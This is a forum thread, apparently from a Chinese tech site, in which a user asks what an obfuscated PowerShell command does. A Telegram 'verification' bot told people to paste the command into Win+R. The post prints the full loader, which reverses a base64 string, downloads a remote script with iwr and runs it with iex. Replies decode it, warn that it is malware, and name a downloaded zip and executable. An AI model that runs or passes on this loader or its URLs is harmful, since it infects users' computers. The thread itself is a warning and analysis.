This topic created in 461 days ago, the information mentioned may be changed or developed.
有没有 window 高手帮忙看下这个代码干了啥
powershell -c $r='0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr') ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))|&('iex')});
昨天一个 Telegram 群要验证是否是真人,提供了上面代码,让用户复制粘贴 Win+R 运行,问了下 chatgpt 提示说是执行了一段网络代码,具体是干什么不熟悉 Window 编程没能搞出来。
有没有 Window 高手帮忙看下这代码到底是干啥了,是否有危险操作。
不清楚风险请不要轻易在自己电脑尝试
不清楚风险请不要轻易在自己电脑尝试
不清楚风险请不要轻易在自己电脑尝试
Supplement 1 · Jan 24, 2025
昨天运行了一次🥲,后来才感觉不安全,在犹豫要不要重下装系统
 |
1
ysc3839 Jan 24, 2025 via Android
没必要看,肯定有危险操作
|
 |
2
baysonfox Jan 24, 2025
"它将变量 $r 中的字符串逆序后再用 Base64 解码,然后通过 iwr 下载并用 iex 执行下载到的远程脚本,属于可疑或恶意行为。" ——ChatGPT
100%在干坏事 |
|
3
baysonfox Jan 24, 2025  1
|
 |
4
antik24601 Jan 24, 2025 via Android
想都不用想肯定有问题,正常验证哪有这样的,字符串反转之后 base64 解码就是 payload 的 url ,看起来像是挖矿的
|
 |
5
Greendays Jan 24, 2025
0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa
这串代码,反过来并用 base64 解码,得到一个脚本的地址:  这是用 Deepseek 分析出来的  |
|
6
Greendays Jan 24, 2025
@Greendays
按照 AI 的思路来(这个 AI 反转字符串搞错了),这段代码反转后是: aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudHh0 能匹配的最长的 Base64 编码是: aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudH== 解码出来后确实是一个看上去像是人机验证地址的网页:  |
 |
7
crab Jan 24, 2025 1
最终下载 https=x=easypath.cyou/92374ybvt/y79v54822954.zip 执行。
|
 |
9
noobjalen Jan 24, 2025 1
|
|
10
noobjalen Jan 24, 2025
最后运行 ISDbg.exe
|
 |
11
serical Jan 24, 2025 1
|
 |
12
andyiac OP 确实是 Telegram 上的 Safeguard 中招的,第一次是让点图片验证,然后验证不通过,再验证就换成这个了
https://imgur.com/IOQUdtW.png https://imgur.com/SpdSCN9.png |
 |
13
twig Jan 24, 2025 via iPhone
目测郭宇
|
Select Language